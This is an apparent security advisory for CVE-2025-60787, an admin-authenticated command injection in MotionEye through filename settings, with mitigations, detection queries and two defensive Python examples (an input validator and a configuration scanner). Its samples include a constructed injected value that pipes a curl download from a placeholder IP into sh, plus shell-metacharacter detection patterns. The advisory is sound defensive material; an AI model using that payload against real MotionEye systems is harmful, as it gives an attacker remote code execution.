CVE-2025-60787
📋 TL;DR
MotionEye v0.43.1b4 and earlier is vulnerable to OS command injection: an authenticated user with admin rights can place shell metacharacters in configuration parameters such as image_file_name, and MotionEye writes those values into the Motion configuration without sanitizing them. The injected commands run, with the privileges of the Motion process, when Motion is restarted, giving the attacker remote code execution. Every deployment on a vulnerable version with a reachable admin login is affected.
💻 Affected Systems
- MotionEye
📦 What is this software?
MotionEye by MotionEye Project
MotionEye is a web front end for the Motion video-surveillance daemon: camera settings entered in the browser UI are stored by MotionEye, which generates the Motion configuration files from them and restarts Motion when they change.
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining root/system-level access, installing persistent backdoors, stealing data, and pivoting to other systems.
Likely Case
Attacker gains shell access on the MotionEye server, can modify configurations, install cryptocurrency miners, or use the system as a foothold for further attacks.
If Mitigated
Limited impact due to network segmentation, minimal privileges, and monitoring catching exploitation attempts.
🎯 Exploit Status
Exploitation requires admin credentials. Public proof-of-concept code exists on GitHub showing command injection through image_file_name parameter.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Not available
Vendor Advisory: http://motioneye-project.com
Restart Required: Yes
Instructions:
1. Check the installed MotionEye version (see How to Verify below).
2. Monitor the official MotionEye project for security updates.
3. Apply the patch when it is available.
4. Restart the MotionEye service (which also restarts Motion) after patching.
🔧 Temporary Workarounds
Input Validation and Sanitization
Implement strict input validation on filename and path configuration parameters so that values containing shell metacharacters are rejected before they are written to the Motion configuration. Rejecting the value is safer than trying to strip characters out of it.
# Modify MotionEye source code to validate user input before writing to config files
# Example: allow only letters, digits, '.', '_', '-', '/' and Motion's '%' conversion specifiers in image_file_name; reject ';', '|', '&', '$', backticks, quotes and whitespace
# Caveat: an allow-list of only alphanumerics, underscores and dots would also reject legitimate Motion patterns such as %Y-%m-%d/%H-%M-%S-%q, so keep '%', '-' and '/' in the allow-list
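The allow-list check described above, written out as an added example (this is not MotionEye's own code). It assumes that Motion filename patterns consist of ordinary filename characters plus '%' conversion specifiers (such as %Y, %m, %d, %H, %M, %S, %q, %v), and that MotionEye exposes a second pattern parameter, movie_file_name, with the same grammar; the function names are hypothetical. Values are rejected rather than rewritten, absolute paths and '..' components are refused so a pattern cannot escape the camera's target directory, and the same function doubles as the test for the "Verify Fix Applied" step below.

```python
import re

# Added example: allow-list validator for MotionEye filename-pattern settings.
# Assumptions (not from the advisory): Motion filename patterns are ordinary filename
# characters plus '%' conversion specifiers, and movie_file_name shares that grammar.
FILENAME_PARAMS = ("image_file_name", "movie_file_name")

# One token is a plain allowed character, or '%' followed by a specifier letter
# (or '%%' for a literal percent sign). Nothing the shell interprets is allowed.
_SAFE_PATTERN = re.compile(r"(?:[A-Za-z0-9._/-]|%[A-Za-z%])+")
_SHELL_METACHARS = re.compile(r"[;&|`$<>(){}\[\]\\'\"\s]")


def validate_filename_pattern(name: str, value) -> None:
    """Raise ValueError unless value is a safe, relative Motion filename pattern."""
    if not isinstance(value, str) or not value:
        raise ValueError(f"{name}: must be a non-empty string")
    # Checked first so the error message names the actual problem for an injection attempt.
    if _SHELL_METACHARS.search(value):
        raise ValueError(f"{name}: contains shell metacharacters")
    if not _SAFE_PATTERN.fullmatch(value):
        raise ValueError(f"{name}: contains characters outside the allow-list")
    if value.startswith("/") or ".." in value.split("/"):
        raise ValueError(f"{name}: must be a relative path without '..' components")


def validate_camera_config(config: dict) -> list:
    """Return one error string per invalid filename-pattern parameter in config (empty if all pass)."""
    errors = []
    for name in FILENAME_PARAMS:
        if name in config:
            try:
                validate_filename_pattern(name, config[name])
            except ValueError as exc:
                errors.append(str(exc))
    return errors


if __name__ == "__main__":
    # Constructed sample payloads, not captured traffic.
    good = {"image_file_name": "%Y-%m-%d/%H-%M-%S-%q"}
    bad = {"image_file_name": "snap;curl http://198.51.100.7/x|sh"}
    print(validate_camera_config(good))  # []
    print(validate_camera_config(bad))   # ['image_file_name: contains shell metacharacters']
```

In MotionEye the check belongs at the point where the submitted camera settings are accepted, before anything is written to the Motion configuration; reject the whole request if the returned list is non-empty.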
Restrict Admin Access
Limit the admin account to trusted operators and protect it with a strong, unique password; anyone who can log in as admin can exploit this issue.
# Review the admin credentials in MotionEye settings (admin_username / admin_password in motioneye.conf); MotionEye has one admin user and one surveillance user, so the admin password should not be shared
# MotionEye has no built-in multi-factor authentication: if you need it, put the UI behind a reverse proxy or VPN that enforces it
🧯 If You Can't Patch
- Network segmentation: Isolate MotionEye instances from critical systems and restrict outbound connections, so that a payload download or reverse shell from the server fails.
- Put a reverse proxy or web application firewall in front of the UI and block configuration requests whose parameter values contain shell metacharacters (`;`, `|`, `&`, `$`, backticks); Motion's own `%` filename patterns do not use these characters, so such a rule does not break legitimate settings.
🔍 How to Verify
Check if Vulnerable:
Check MotionEye version in web interface or configuration files. If version is v0.43.1b4 or earlier, system is vulnerable.
Check Version:
pip show motioneye 2>/dev/null | grep -i '^version'
python3 -c 'import motioneye; print(motioneye.VERSION)'
The second command assumes the package exposes a VERSION attribute; if it does not, rely on pip show. The version is also displayed in the web interface. Note that motioneye.conf does not record the version, so grepping that file is not a reliable check.
Verify Fix Applied:
After applying the validation workaround, submit a test value containing shell metacharacters (for example test;id) through the image_file_name field of a non-production camera and confirm that the request is rejected and that the value never appears in the generated Motion configuration under /etc/motioneye.
📡 Detection & Monitoring
Log Indicators:
- Unusual configuration changes in motioneye.log, especially changes to filename or path settings outside normal maintenance windows
- Shell processes spawned by the motion process after a restart (for example sh -c children seen through auditd or process monitoring), and commands in system logs that Motion has no reason to run
- Multiple failed admin login attempts
Network Indicators:
- Unexpected outbound connections from MotionEye server
- Suspicious payloads in HTTP POST requests to configuration endpoints
SIEM Query (Splunk-style):
source="motioneye.log" ("image_file_name" OR "configuration") | regex _raw="(\||;|\$\(|`|&&)"
Punctuation such as | and ; is not indexed as a standalone search term under default segmentation, so matching it with a regex over _raw is more reliable than quoting the characters as search terms. Expect some noise from the word "configuration"; tune the first clause to your log format.
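A host-side complement to the log query, as an added example that is not part of the advisory or of MotionEye: it scans the Motion configuration files MotionEye generates for values that would reach a shell. It assumes that MotionEye writes per-camera files named camera-N.conf (thread-N.conf in older releases) under /etc/motioneye, and that the relevant Motion directives are picture_filename, movie_filename, target_dir and the on_* event hooks; the sample configuration is constructed, including the hook command and the 198.51.100.7 address. Filename and directory directives containing shell metacharacters are reported as alerts, while on_* hooks are always listed for review because whatever they contain runs as a shell command when Motion fires the event.

```python
import re
from pathlib import Path

# Added example: forensic scan of MotionEye-generated Motion configuration.
# Assumptions (not from the advisory): file names camera-N.conf / thread-N.conf under
# /etc/motioneye, and the directive names below. The sample text is constructed.
CONFIG_DIR = Path("/etc/motioneye")
PATH_DIRECTIVES = {"picture_filename", "movie_filename", "target_dir"}
HOOK_PREFIX = "on_"
_SHELL_METACHARS = re.compile(r"[;&|`$<>(){}\\'\"]")


def parse_motion_config(text: str):
    """Yield (directive, value) pairs from Motion-style 'directive value' lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(";"):
            continue
        parts = line.split(None, 1)
        yield parts[0], (parts[1] if len(parts) > 1 else "")


def scan_motion_config(text: str) -> list:
    """Return findings as (severity, directive, value) tuples, in file order."""
    findings = []
    for directive, value in parse_motion_config(text):
        if directive in PATH_DIRECTIVES and _SHELL_METACHARS.search(value):
            findings.append(("alert", directive, value))
        elif directive.startswith(HOOK_PREFIX):
            # Hooks are shell commands run by Motion on events: always surface them for review.
            findings.append(("review", directive, value))
    return findings


def scan_config_dir(directory: Path = CONFIG_DIR) -> dict:
    """Scan every camera-*.conf / thread-*.conf in directory; returns {path: findings}."""
    results = {}
    if not directory.is_dir():
        return results
    for pattern in ("camera-*.conf", "thread-*.conf"):
        for path in sorted(directory.glob(pattern)):
            results[str(path)] = scan_motion_config(path.read_text(errors="replace"))
    return results


# Constructed sample, not a real MotionEye-generated file.
SAMPLE_CONFIG = """\
# camera 1
camera_name Front Door
target_dir /var/lib/motioneye/Camera1
picture_filename %Y-%m-%d/%H-%M-%S-%q
movie_filename %Y-%m-%d/%H-%M-%S
on_picture_save /usr/share/motioneye/scripts/relayevent.sh "/etc/motioneye/motioneye.conf" picture_save %t %f
"""

# The same file after an admin-level injection into image_file_name (constructed).
SAMPLE_TAMPERED = SAMPLE_CONFIG.replace(
    "picture_filename %Y-%m-%d/%H-%M-%S-%q",
    "picture_filename snap;curl http://198.51.100.7/x|sh #",
)

if __name__ == "__main__":
    for label, text in (("clean", SAMPLE_CONFIG), ("tampered", SAMPLE_TAMPERED)):
        print(label, scan_motion_config(text))
    for path, findings in scan_config_dir().items():
        print(path, findings)
```

Run it on the MotionEye host after any suspected admin compromise and diff the review lines against the hook commands you expect; the original value is not recoverable from the generated file, so treat an alert as confirmation that the injection reached Motion, not as the only evidence to collect.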